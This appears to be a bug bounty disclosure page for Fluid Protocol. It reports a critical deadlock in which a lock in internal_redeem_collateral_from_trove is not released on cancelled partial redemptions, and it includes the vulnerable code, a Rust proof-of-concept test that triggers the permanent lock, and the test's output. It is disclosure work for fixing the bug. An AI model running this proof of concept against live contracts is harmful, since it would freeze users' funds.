    • #35014 [SC-Low] incorrect rounding in mintdebt function might allow minimal shares dilution
    • #34978 [SC-Low] protocol runs insolvent due to incorrect reliance on depositbalance which doesn t match holder balances
    • #35026 [SC-Low] `repayDebt` in stbtc returns a worng value
    • #34995 [SC-Low] `mintDebt()` and `repayDebt()` should return `assets` and not `shares`
    • #34712 [SC-Medium] Malicious users can block repay debt transactions with no cost
    • #34998 [SC-Insight] Deposited assets in an old dispatcher may be lost when swapping to a new dispatcher
    • #34672 [SC-Low] Protocol runs insolvent due to incorrect reliance on depositBalance which doesn't match holder balances
    • #34999 [SC-Low] The tBTC in the MezoAllocator itself is not considered in the withdrawal function
    • #34748 [SC-Low] Last withdrawer can be prevented from withdrawing their assets
    • #34729 [SC-Low] `releaseDeposit` will likely fail, putting funds in MezoAllocator at risk of being permanently stuck
    • #34851 [SC-Low] Adversary can freeze users' fund in stBTC using donation attack on MezoAllocator
  • Shardeum Core II
    • #36029 [BC-Insight] Node.js crash on counterMap overflow
    • #35696 [BC-Critical] Specifically crafted penalty TX may cause total network shutdown.
    • #35694 [BC-Critical] Consensus can be bypassed by single validator node from transaction execution group
    • #35601 [BC-Critical] Consensus algorithm doesn't deduplicate votes, allowing a malicious validator to completely falsify transactions
    • #35695 [BC-Critical] validateTxnFields check for internal transactions can be bypassed
    • #35531 [BC-Critical] Absence of signature deduplication for receipt in the binary_repair_oos_accounts P2P handler
    • #36024 [BC-Insight] Use of Vulnerable function results in prediction of archivers
    • #35965 [BC-Insight] Unverified data in safety sync
    • #35707 [BC-Critical] Reusing old transaction receipt to rollback account balance
    • #35415 [BC-Insight] [Informational] debugMiddleware query parameters can be partially modified by request submitter or via MITM
    • #35839 [BC-Critical] Slash avoidance: Ineffective controls on unstaking allow unstaking before taking an action that should be slashed
    • #35526 [BC-Critical] An attacker can change the account balance after the transaction has been processed.
    • #35641 [BC-Insight] node p2p remote denial of service
    • #35697 [BC-Insight] [Informational] Code logic contains potential risk of full network shutdown
    • #35710 [BC-Insight] addressToPartition input is unsanitized, allowing to take whole network down
  • Shardeum Ancillaries II
    • #35598 [W&A-Insight] Access to debug endpoints without any protection
    • #35351 [W&A-Insight] Password Length Bypass in Shardeum Authentication System
    • #35537 [W&A-Insight] json rpc server websocket remote crash
    • #35996 [W&A-Insight] malicious explorer can cause denial of service in json rpc server and even cras
    • #35979 [W&A-High] malicious archiver malicious validator can overwrite data on any active archiver
    • #36025 [W&A-Critical] A malicious validator can overwrite the account data of any archive server connected to it.
    • #35452 [W&A-High] Admin Panel Accessed
    • #36005 [W&A-Insight] Reflected URL Manipulation and Phishing Risk
    • #35972 [W&A-Insight] Operator-GUI Weak JWT Token Generation Led To Generate same JWT Tokens Even if The User Has it's Unique "nodeId"
    • #35447 [W&A-High] Zero Click Full Account Takeover
    • #35446 [W&A-Insight] IDOR Able to change other user information
    • #35903 [W&A-High] SQL Injection Allows a Malicious Archiver to Overwrite Receipt/originalTxData Database on Any Active Archiver in the Network
    • #35824 [W&A-Medium] `/set-config` replay attack is possible in production mode after archiver restart
    • #35157 [W&A-Insight] Unauthorized Access to Shardeum Config Store using default credentials
    • #35709 [W&A-Critical] Potential DoS of archiver-server during network restoration via get_account_data_archiver call
    • #35534 [W&A-Insight] json rpc server remote crash
  • Anvil
    • #36303 [SC-Medium] attackers can cause griefing attack to cause stake transactions of timebasedcolla
    • #36501 [SC-Medium] Signature Front-Running Vulnerability in CollateralVault
    • #36268 [SC-Medium] stake with signature can be front-run lead to user's stake failed
    • #36267 [SC-Insight] tokens can be stuck forever in uniswapliquidator because function retrievetokens
    • #36136 [SC-Insight] Fee calculation error in withdraw function of collateralVault contract
    • #36092 [SC-Insight] Collateralizable Contracts May Retain Status Unconditionally
    • #36540 [SC-Insight] users can withdraw funds at incorrect fee rate
    • #36567 [SC-Insight] Anyone can cancel anyone's LOC
    • #36554 [SC-Critical] Time Based Collateral Pool Users can release more than their due share of the pool, drawing from the due share of other users
    • #36552 [SC-Medium] DoS for the user's calling `stake` and `stakeReleasableTokensFrom` function
    • #36532 [SC-Medium] Frontrun to invalidate collateralizable approval signature
    • #36306 [SC-Insight] Incorrect nonce value emitted in `TimeBasedCollateralPool::_resetPool` event
    • #36475 [SC-Medium] Token allowance signature can be front-run
    • #36450 [SC-Low] contract timebasedcollateralpool will be unable to process new user transactions
    • #36346 [SC-Insight] Typehash Discrepancy in CollateralizableTokenAllowanceAdjustment
    • #36340 [SC-Insight] TimeBasedCollateralPool::_resetAccountTokenStateIfApplicable does not adjust tokenEpochExitBalances after redeeming the account's unstake Units
    • #36309 [SC-Low] TimeBasedCollateralPool: After _resetPool gets called (internally) a depositor can break most functionalities of the smart contract
  • Anvil: Letters of Credit
    • #36807 [SC-Critical] attackers can create dynamic loc with any credited amount with very small co...
    • #36931 [SC-Critical] critical creators can modifyloccollateral of dynamic loc to release ....
    • #36910 [SC-Critical] LoC: The creator can withdraw the entire collateral of a Dynamic LoC making it insolvent
    • #36970 [SC-Insight] Missing `_disableInitializer()` implementation
    • #36999 [SC-Insight] Incomplete Adjustment of `globalAmountInDynamicUse` During LOC Liquidation Causes Accumulated Dust and DoS Risk
  • Fluid Protocol
    • #36922 [SC-Insight] the function claim_collateral in borrowOperation have read only attribute while the invoked claim_collateral function have write attribute, this lead to compiler-time error
    • #37056 [SC-Insight] `require_at_least_min_net_debt` did not emit correct error message
    • #37139 [SC-Insight] insight inefficient use of storage reentrancy locks
    • #37192 [SC-Low] Trove that under MCR might be redeemed.
    • #37276 [SC-Medium] Redstone's price feed is used incorrectly.
    • #37202 [SC-Insight] some checks can be removed since its not required(best practice report, not an issue)
    • #37283 [SC-Low] Improper Trove Validation Check Allows Low-Cost Griefing Attack to Block Protocol Redemptions
    • #37343 [SC-Insight] inaccurate check leading to debt miscalculation
    • #37323 [SC-Critical] Permanent dead Lock in internal_redeem_collateral_from_trove
    • #37354 [SC-Low] Single below MCR trove temporarily blocks redemptions
    • #37382 [SC-Insight] Inconsistent Collateral Ratio Checks in Stability Pool Withdrawals Lead to Fund-Locking DoS
    • #37409 [SC-Low] Can not redeem when all `current_cr` less than `MCR`.
    • #37425 [SC-Insight] redeem collateral does not redeem collateral from riskiest trove but wrongly redeem
    • #37452 [SC-Critical] `trove-manager-contract.redeem_collateral_from_trove` can be locked forever
    • #37595 [SC-Insight] `require_caller_is_bo_or_tm_or_sp_or_pm` did not emit correct message
    • #37607 [SC-Low] bricking redeem function
    • #37624 [SC-Critical] lock issue bricks the redeem functionality
    • #37650 [SC-Low] redeem functionality partially failing
    • #37668 [SC-Low] Incorrect Scale Factor value leads to early scale change
    • #37671 [SC-Critical] CRITICAL-02 / The contract could be permanently locked due to not reseting the boolen lock
  • Folks: Liquid Staking
    • #37660 [SC-High] incorrect tracking of `TOTAL_ACTIVE_STAKE` leads to permanent freezing of funds
    • #37661 [SC-High] Incorrect `total_active_stake` reduction causes loss of funds for the users and excessive fees collection over time
    • #37768 [SC-Insight] Missing Event Emission when proposer are added prevents safe retrieval of index for subsequent operations
    • #37775 [SC-High] Accounting Discrepancy in `consensus_v2.py::burn()`can potentially cause underflow and lead to temporary Denial of Service and a deliberate DOS Attack
    • #37791 [SC - Insight] consensus contract distributes algo for proposers that are offline that cause losing of reward
    • #37807 [SC-Insight] Truncation of mint_amount to zero leading to potential stake loss
    • #37852 [SC-High] The accumulation of rewards is being decreased from the active stake which could leave out users unable to redeem xAlgo
    • #37854 [SC-Insight] Missing state validation upon Upgrade
    • #37864 [SC-Insight] Over-charging users on delayed mint
    • #37863 [SC-High] Underflow in burn method prevents all xALGO from being burnt
    • #37867 [SC-Low] Contract upgrade failing due to SHA256 failing because of AVM byte width limits
    • #37889 [SC-High] Underflow in `burn()` function will cause user funds to partially frozen
    • #37903 [SC-High] "Potential Underflow Vulnerability in burn Function for total_active_stake_key"
    • #37893 [SC-Insight] inflation attack in xalgo
    • #37940 [SC-High] freezing of user funds when reward accumulated or added
  • Jito Restaking
    • #36675 [SC-Insight] Missing revoke instruction leads to Old delegate accounts have unlimited number of token allowance
    • #37315 [SC-High] Theft of Unclaimed Yields Due to Improper Reward Distribution in Vault Program
    • #36787 [SC-Insight] The vault program don't support token2022 transfer
    • #36903 [SC-High] The vault reward mechanism can be sandwiched by MEV
    • #37079 [SC-Insight] Withdrawals can be DOSed by reviving tickets in the same burn tx
    • #37311 [SC-High] Attackers can steal rewards by depositing, updating vault balance and withdrawing immediately after a large reward is deposited
    • #37295 [SC-High] Rewards can be stolen by depositing immediately after reward tokens get sent to vault
    • #37314 [SC-High] Vault creators can not withdraw their fees without being recursively charged (vault and program) fees on their own fees which causes permanent loss of funds
  • SwayLend frontend
    • #37822 [W&A-Insight] insight incorrect amounts displayed to foreign users
    • #37196 [W&A-Insight] DOS due to Misleading 'CircularProgressBar' Display Due to Rounding of 'supplyUsed"
  • Celo
    • #37058 [SC-High] Theft of remuneration through claims processing loops.
    • #37010 [SC-High] Rollback of the incorrect state interferes with the progress of the epoch process, prevents the user from receiving rewards, blocks the launch of the associated contract function, etc
    • #37206 [SC-Medium] Overflow due to lack of checks leading to incorrect price calculation
    • #37251 [SC-Critical] Fraudulent padding of governance voting power
    • #37285 [SC-Critical] Incorrect Delegation State After Slashing in LockedGold Contract
    • #37391 [SC-High] Early Reward Accrual Undermines Validator Group Performance Incentives
    • #37443 [SC-Insight] Race Condition in KeyedBroadcaster Implementation
    • #37427 [SC-Critical] Delegation is not updated on slash and unlock
  • Stacks I Attackathon
    • #38516 [BC-High] Signer can censor transactions and halt the network by providing an invalid nonce or too many nonces
    • #37545 [BC-Medium] Deposits with a lock_time of 16 cannot be processed
    • #38003 [BC-Medium] A malicious coordinator calling `Emily::update_deposits` can make the entire Signers network inoperable
    • #37479 [BC-High] A single signer can lock users' funds by not notifying other signers of the executed `sweep` transaction
    • #38398 [BC-High] Malicious Signers can initiate repeated contract calls to cause the multi-sign wallet to lose tx fee
    • #37530 [BC-Insight] Deposits can be completely DoSed due to incorrect transaction construction
    • #38160 [BC-Insight] Governance calling `sbtc-registry.update-protocol-contract` may cause Stacks' events to be ignored by the signer
    • #37500 [BC-Low] Blocklist can be circumvented due to incorrect blocking logic in `request_decider::can_accept_deposit_request`
    • #38690 [BC-Insight] A malicious coordinator can run multiple DKG coordination in parallel and manipulate their order to break the signers network
    • #38270 [BC-Medium] A signer can send a large number of junk `WstsNetMessage::NonceRequest` through P2P to make other signers run out of memory
    • #38223 [BC-Insight] Attackers can disrupt the tag order of gossip messages to bypass signature verification
    • #37470 [BC-Medium] SBTC Signers do not page through pending deposit requests making it trivially easy to block legit deposits by spamming Emily API
    • #38551 [BC-Medium] A signer can request stacks tx nonces in batches in advance and then DoS other signers' sBTC contract calls
    • #38111 [BC-High] Attackers can send a very large event in a Stacks block so that the Signer can never get the Stacks event
    • #38477 [BC-High] A single signer can abort every attempted signing round by providing an invalid packet once the coordinator requests signature shares
    • #38460 [BC-Low] The coordinator can set a higher BTC tx fee than the current network to make users to pay more fees to the BTC miner
    • #37384 [BC-Medium] Attacker can front-run call to emily api with incorrect data, preventing legit user from registering their deposit
    • #38133 [BC-Medium] A rogue Signer can censor any deposit request from being processed and fullfilled on the Stacks blockchain
    • #38053 [BC-High] A single signer can continuously prevent signatures from being finalized, halting network operations
    • #38740 [BC-High] The missing check in Deposits::DepositScriptInputs::parse() permits losing funds by sending them to an invalid principal
    • #38030 [BC-Insight] Coordinator can be crashed by signers on DKG
    • #38028 [BC-Low] There is a Partial Network Degradation Due to DynamoDB GSI Throttling Under High Traffic
    • #38458 [BC-Critical] The coordinator can submit empty BTC transactions to drain BTC tokens in the multi-sign wallet
    • #38671 [BC-Insight] Signer key rotation is not possible due to deadlock between submitting key rotation to Stacks and retrieving it
    • #38392 [BC-High] Signer can steal STX tokens in multi-sign wallet by setting a high stacks tx fee
    • #37861 [BC-Critical] SBTC Signer WSTS implementation allows nonce replays such that a malicious signer can steal all funds
    • #38605 [BC-Low] Lack of fee_rate/last_fees validation in handle_bitcoin_pre_sign_request ebables rogue signer to cause financial loss to depositors
    • #38582 [BC-High] The `BitcoinCoreClient::get_tx_info` does not support coinbase transactions, which may cause sBTC to be attacked by btc miners or sBTC donations to be lost
    • #37814 [BC-High] Signers can crash other signers by sending an invalid `DkgPrivateShares` due to missing check before passing the payload to `SignerStateMachine::process`
    • #37777 [BC-Medium] `Emily.create_deposit` can overwrite any deposit to the Pending state
    • #37811 [BC-High] Missing length check when parsing `SignatureShareRequest` in the signers allows the coordinator to halt other signers, shutting down the network
    • #37718 [BC-High] Key rotations bricks the system due to incorrect `aggregate_key` being used to spend the `peg UTXO` when signing a sweep transaction
  • Lombard
    • #38012 [SC-Insight] Unused Function in CLAdapter Contract
    • #38066 [SC-Medium] `ProxyFactory` is vulnerable to DoS/Address Hijacking
    • #38102 [SC-Insight] Due to incorrect design in `BasculeV2::validateWithdrawal` valid transactions will be reverted, which will make protocol unable to mint tokens
    • #38116 [SC-Insight] Partner vaults don't account for FireBridge fees, forcing LBTC burn to never work
    • #38137 [SC-Low] `RateLimits` library incorrectly reset the consumed amount when the limit is updated
    • #38148 [SC-Insight] Unnecessary Storage Pointer Declaration batchMintWithFee
    • #38154 [SC-Medium] The offchain data provided to the CLAdapter isn’t properly validated and can be from a different CCIP message, resulting in the freezing of funds
    • #38189 [SC-Insight] Attacker can grief calls to `lbtc.mintWithFee()`
    • #38231 [SC-Low] Due to incorrect design in `Consortium::setNextValidatorSet` the validator set could not be set in certain valid scenarios
    • #38225 [SC-Insight] user funds will get stuck if `removeDestination` executes before notarization and withdraw.
    • 38286 [SC-Low] bitcoinutils getdustlimitforoutput calculate wrongly the dust limit for a given bitcoin script public key
    • #38257 [SC-Insight] Freezing of msg.value passed in Bridge.deposit() if adapter is address zero
    • #38341 [SC-Insight] Suboptimal gas usage and ambiguous behavior during fee estimation
    • 38335 [SC-Medium] attacker can exploit partnervault mint small amount to cause lbtc depeg or protocol insolvency
    • #38342 [SC-Medium] Interchanging `offchainTokenData` between two valid messages
    • #38363 [SC-Medium] LBTC cross-chain transfer can be DOSed
    • #38344 [SC-Low] Old validated messages can not pass proof check when new validators are set
    • #38634 [SC-Medium] Insufficient validation on offchainTokenData in TokenPool.releaseOrMint allows CCIP message to be executed with mismatched payload potentially leading to loss of funds in cross-ch...
    • #38370 [SC-Insight] Issue Between Comment and Code in Consortium
    • #38644 [SC-Insight] Q&A
  • Butter
    • #39181 [SC-Insight] Bond Fund will be Lost When Question is Asked Again
    • #39153 [SC-Insight] Unauthorized Token Creation and Minting Vulnerability
    • #39243 [SC-Insight] Misleading Comment in merge Function Regarding Token Transfers to wrapped1155Factory
    • #39271 [SC-Insight] Check `numericAnswer` before external call to check answer is valid or not
    • #39487 [SC-Insight] flatCfmImplementation and conditionalScalarMarketImplementation contracts can be initialized by anyone
    • 39495 [SC-Low] flatcfm cannot be resolved in case answer of questionid are in greater or equal to 2 outcome count and answer 2 outcome count is 0
    • #39528 [SC-Insight] Lack of Validation for Min and Max Values in FlatCFMFactory leads to wrong payouts
    • #39524 [SC-Insight] Incorrect Outcome Formatting in Reality Adapter Leads to Wrong Number of Outcomes
    • #39539 [SC-Insight] Insufficient validation of tokens when created in `PlayCollateralTokenFactory::createCollateralToken`
  • Zano IOP
    • #41027 [BC-Insight] Breaking asset surjection proof assumptions
    • #40530 [W&A-High] JWT Salt Expiration isn't entirely correct in wallet_rpc_server::auth_http_request
    • #40990 [BC-Insight] Security best practices
    • #40970 [BC-Insight] Double spending by using 0-point stealth address and signature elements in CLSAG-GGX proof verification
    • #40794 [W&A-Insight] Unsecured Wallet Voting Configuration Allows Unauthorized Vote Manipulation Despite Password Protection
  • Shardeum Ancillaries III
    • #39360 [W&A-Insight] getRandomActiveNodes may return inconsistent results
    • #39993 [W&A-Low] node-fetch without response limit
    • 39829 [W&A-Critical] dos archiver via data subscription channel due to broken safestringfy
    • #40004 [W&A-Critical] Multiple vulnerabilities in signature verification during receipt processing on the archiver server
    • #39942 [W&A-Medium] Archiver is still vulnerable to replay attack to `/set-config`
    • #39980 [W&A-Critical] Malicious validator can inject its own cycle record into connected archiver
    • #39434 [W&A-Critical] Improper serialization can create an out-of-memory (OOM) issue on the archive server.
    • 39944 [W&A-Insight] incorrect default configuration leading to dead code
    • 39893 [W&A-Critical] malicious validator can modify txid in global transactions
    • #39910 [W&A-Medium] Numerous replay attacks (with arbitrary data) to protected endpoints are possible
    • 39872 [W&A-Critical] bypass receipt signing validation
    • #39814 [W&A-Low] Prevent new validators from joining the network by a DOS of the archiver
    • #39284 [W&A-Medium] Arbitrarily set any archiver config and remotely turning it off
    • #39109 [W&A-Insight] syncStateDataGlobals will not work, effectively DoS'ing nodes
    • #39623 [W&A-Low] Blocking the victim's account address from sending transactions via JSON-RPC
    • 39626 [W&A-Critical] malicious validator can overwrite any cycle data
    • #39820 [W&A-Medium] Blocking all users from interacting with particular contracts/protocols via JSON-RPC server
  • Shardeum Core III
    • #39873 [BC-Critical] Lack of validation of node activation time in `InitRewardTimes` allows to steal rewards
    • #39811 [BC-Critical] inducing large memory allocation via join endpoint
    • #39921 [BC-Critical] accountDeserializer isn't type safe
    • #39913 [BC-Medium] No rate Limiting in resource-intensive endpoint
    • #39885 [BC-Critical] Signature forgery on behalf of network nodes using binary_sign_app_data endpoint
    • #39876 [BC-Critical] Receiving rewards multiple times for the same period
    • #39871 [BC-Critical] Lack of consensus voting in best cycle calculation allows a malicious validator to fake cycle data and crash all nodes
    • #39838 [BC-Critical] Bypass certificate signing validation by double counting signatures due to signature malleability
    • #39813 [BC-Critical] Bypass `SetCertTime` transaction signature check #2
    • #39103 [BC-Insight] Unchecked data size in "getStakeTxBlobFromEVMTx()" can use lots of CPU resources
    • #39791 [BC-Critical] Filling the queue with "setCertTime" stop the network from processing new transactions
    • 39679 [BC-Critical] bypass certificate signing validation by double counting signatures due to ignor
    • #39678 [BC-Critical] Bypass certificate signing validation by double counting signatures due to capitalization
    • #39675 [BC-Critical] Reward Exploitation via Unvalidated Node Status in "initRewardTX"
    • 39164 [BC-Insight] service point exhaustion
    • #39875 [BC-Critical] Lack of validation of node deactivation time in `ClaimRewards` allows to steal rewards
    • 39882 [BC-Insight] data unsubscribe same node replay
    • 39027 [BC-Insight] abusive join request handler node
    • #39149 [BC-High] EIP-2930 transactions with 20k-address overload the nodes and force the network into "safety" mode
    • #39850 [BC-Medium] Bypass TransferFromSecureAccount transaction validations
    • #39507 [BC-Critical] Insufficient validation on ClaimReward transaction allows attacker to claim an inflated reward OR prevent all nodes from being rewarded
    • #39364 [BC-Critical] Trusting heavily on "appData" enables infinite SHM duplication through double-spend exploit
    • 39355 [BC-Critical] tricking legit node to sign their own apoptosis request payload
    • #39812 [BC-Critical] Bypass `SetCertTime` transaction signature check #1
    • #39994 [BC-Critical] Tricking nodes into signing nearly-arbitrary data
    • 40005 [BC-Critical] removal of node out of network via remove by app gossip and signature duplicat
    • #39973 [BC-Critical] Standard node rewarding flow can be blocked
    • #40000 [BC-Critical] Improper input validation in fixDeserializedWrappedEVMAccount leads to DOS and total network shutdown
    • #39511 [BC-Critical] malicious node can drain balance of other node s nominator evm address
    • #39463 [BC-Insight] `multiSendWithHeader` and `sendWithHeader` have JSON injection vulnerability
    • #39395 [BC-Medium] got.get without response limit
    • #39465 [BC-Critical] Lack of authorization on InitClaimReward transaction allows attacker to prevent all nodes from being rewarded
    • #39752 [BC-Insight] There is an issue related to incorrect version parsing and comparison logic lead to incorrect node validation,
    • #39191 [BC-Critical] JoinRoute: Attacker reachable input serialization
    • #40007 [BC-Critical] Drain node staking account due to improper validation of SetCertTime internal transaction
    • #39979 [BC-Critical] Total network shutdown via fixDeserializedWrappedEVMAccount call through binary_repair_oos_accounts endpoint
  • IOP CircuitDAO
    • #43705 sc critical attackers can exploit lack of validation in byc coin issuance pro
    • #44355 sc high announcer owner can inflate announcers registry entries via mutate and register loop
    • #44324 sc medium atom announcer owner can nulify financial penalty
Powered by GitBook
On this page
  • Description
  • Brief/Intro
  • Vulnerability Details
  • Impact Details
  • References
  • Proof of Concept
  • Proof of Concept
  • output log

Was this helpful?

  1. Fluid Protocol

#37323 [SC-Critical] Permanent dead Lock in internal_redeem_collateral_from_trove

Previous#37343 [SC-Insight] inaccurate check leading to debt miscalculationNext#37354 [SC-Low] Single below MCR trove temporarily blocks redemptions

Was this helpful?

Submitted on Dec 2nd 2024 at 08:51:54 UTC by @Catchme for

  • Report ID: #37323

  • Report Type: Smart Contract

  • Report severity: Critical

  • Target: https://github.com/Hydrogen-Labs/fluid-protocol/tree/main/contracts/trove-manager-contract/src/main.sw

  • Impacts:

    • Permanent freezing of funds

    • Permanent freezing of unclaimed yield

    • Smart contract unable to operate due to lack of token funds

    • Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)

Description

Brief/Intro

The lock in internal_redeem_collateral_from_trove is not released, causing a deadlock.

Vulnerability Details

in the function internal_redeem_collateral_from_trove When new_debt < MIN_NET_DEBT, the lock in internal_redeem_collateral_from_trove is not released, causing a deadlock.

// contracts/trove-manager-contract/src/main.sw
...

#[storage(read, write)]
fn internal_redeem_collateral_from_trove(
...
    // If the trove's debt is fully redeemed, close the trove
    if (new_debt == 0) {
        internal_remove_stake(borrower);
        internal_close_trove(borrower, Status::ClosedByRedemption);
        internal_redeem_close_trove(borrower, 0, new_coll);
    } else {
        // Calculate the new nominal collateralization ratio
        let new_nicr = fm_compute_nominal_cr(new_coll, new_debt);
        // If the new debt is below the minimum allowed, cancel the partial redemption
        
        ///////////////////////////////////////////////////////////
        ///////////////////////////////////////////////////////////
        ///////////////////////////////////////////////////////////
        if (new_debt < MIN_NET_DEBT) {
            single_redemption_values.cancelled_partial = true;  
            return single_redemption_values;                   
            // VULN : The `lock_internal_redeem_collateral_from_trove` is not released. 
            
        }
        ///////////////////////////////////////////////////////////
        ///////////////////////////////////////////////////////////
        ///////////////////////////////////////////////////////////
        
        // Re-insert the trove into the sorted list with its new NICR
...
}

Impact Details

This vulnerability can cause a deadlock in the contract permanently

References

https://github.com/Hydrogen-Labs/fluid-protocol/blob/main/contracts/trove-manager-contract/src/main.sw#L819

Proof of Concept

Proof of Concept

use fuels::{prelude::*, types::Identity};
use test_utils::data_structures::{ContractInstance, PRECISION};
use test_utils::interfaces::oracle::oracle_abi;
use test_utils::interfaces::protocol_manager::ProtocolManager;
use test_utils::interfaces::pyth_oracle::PYTH_TIMESTAMP;
use test_utils::utils::print_response;
use test_utils::{
    interfaces::{
        active_pool::active_pool_abi,
        borrow_operations::{borrow_operations_abi, BorrowOperations},
        coll_surplus_pool::coll_surplus_pool_abi,
        protocol_manager::protocol_manager_abi,
        pyth_oracle::{pyth_oracle_abi, pyth_price_feed},
        token::token_abi,
        trove_manager::{trove_manager_abi, trove_manager_utils, Status},
    },
    setup::common::setup_protocol,
    utils::with_min_borrow_fee,
};

#[tokio::test]
async fn test_dead_lock() {
    let (contracts, _admin, mut wallets) = setup_protocol(5, true, false).await;

    let healthy_wallet1 = wallets.pop().unwrap();

    let balance: u64 = 12_000 * PRECISION;

    token_abi::mint_to_id(
        &contracts.asset_contracts[0].asset,
        balance,
        Identity::Address(healthy_wallet1.address().into()),
    )
    .await;

    let borrow_operations_healthy_wallet1 = ContractInstance::new(
        BorrowOperations::new(
            contracts.borrow_operations.contract.contract_id().clone(),
            healthy_wallet1.clone(),
        ),
        contracts.borrow_operations.implementation_id.clone(),
    );

    let coll1 = 6000 * PRECISION;
    let debt1 = 2000 * PRECISION;

    oracle_abi::set_debug_timestamp(&contracts.asset_contracts[0].oracle, PYTH_TIMESTAMP).await;
    pyth_oracle_abi::update_price_feeds(
        &contracts.asset_contracts[0].mock_pyth_oracle,
        pyth_price_feed(1),
    )
    .await;

    borrow_operations_abi::open_trove(
        &borrow_operations_healthy_wallet1,
        &contracts.asset_contracts[0].oracle,
        &contracts.asset_contracts[0].mock_pyth_oracle,
        &contracts.asset_contracts[0].mock_redstone_oracle,
        &contracts.asset_contracts[0].asset,
        &contracts.usdf,
        &contracts.fpt_staking,
        &contracts.sorted_troves,
        &contracts.asset_contracts[0].trove_manager,
        &contracts.active_pool,
        coll1,
        debt1,
        Identity::Address(Address::zeroed()),
        Identity::Address(Address::zeroed()),
    )
    .await
    .unwrap();

    //------------------------------------------------
    // Here is the PoC
    // Firstly wallet1 opens a trove with 6000 collateral and 2000 debt
    // Then wallet1 tries to redeem 1600 collateral
    // During the redemption in contract `trove-manager-contract`'s funciton `internal_redeem_collateral_from_trove`
    // The new debt is 2000 - 1600 = 400 < MIN_NET_DEBT 
    //------------------------------------------------


    let redemption_amount: u64 = 1600 * PRECISION;

    let protocol_manager_health1 = ContractInstance::new(
        ProtocolManager::new(
            contracts.protocol_manager.contract.contract_id().clone(),
            healthy_wallet1.clone(),
        ),
        contracts.protocol_manager.implementation_id,
    );

    oracle_abi::set_debug_timestamp(&contracts.asset_contracts[1].oracle, PYTH_TIMESTAMP).await;
    pyth_oracle_abi::update_price_feeds(
        &contracts.asset_contracts[1].mock_pyth_oracle,
        pyth_price_feed(1),
    )
    .await;

    protocol_manager_abi::redeem_collateral(
        &protocol_manager_health1,
        redemption_amount,
        10,
        0,  
        None,
        None,
        &contracts.usdf,
        &contracts.fpt_staking,
        &contracts.coll_surplus_pool,
        &contracts.default_pool,
        &contracts.active_pool,
        &contracts.sorted_troves,
        &contracts.asset_contracts,
    )
    .await;

    dbg!("Redeem collateral finished");

    // This will cause dead lock, and the transaction will be reverted

    protocol_manager_abi::redeem_collateral(
        &protocol_manager_health1,
        20,
        10,
        0,
        None,
        None,
        &contracts.usdf,
        &contracts.fpt_staking,
        &contracts.coll_surplus_pool,
        &contracts.default_pool,
        &contracts.active_pool,
        &contracts.sorted_troves,
        &contracts.asset_contracts,
    )
    .await;

}

output log

test test_dead_lock ... FAILED

successes:

successes:

failures:

---- test_dead_lock stdout ----
Deploying core contracts...
Initializing core contracts...
[contracts/protocol-manager-contract/tests/success_redemptions.rs:116:5] "Redeem collateral finished" = "Redeem collateral finished"
thread 'test_dead_lock' panicked at /home/upon/Documents/work/fluid-protocol/test-utils/src/interfaces/protocol_manager.rs:214:14:
called `Result::unwrap()` on an `Err` value: Transaction(Reverted { reason: "AsciiString { data: \"TroveManager: Internal redeem collateral from trove is locked\" }", revert_id: 18446744073709486080, receipts: [Call { id: 0000000000000000000000000000000000000000000000000000000000000000, 
IOP | Fluid Protocol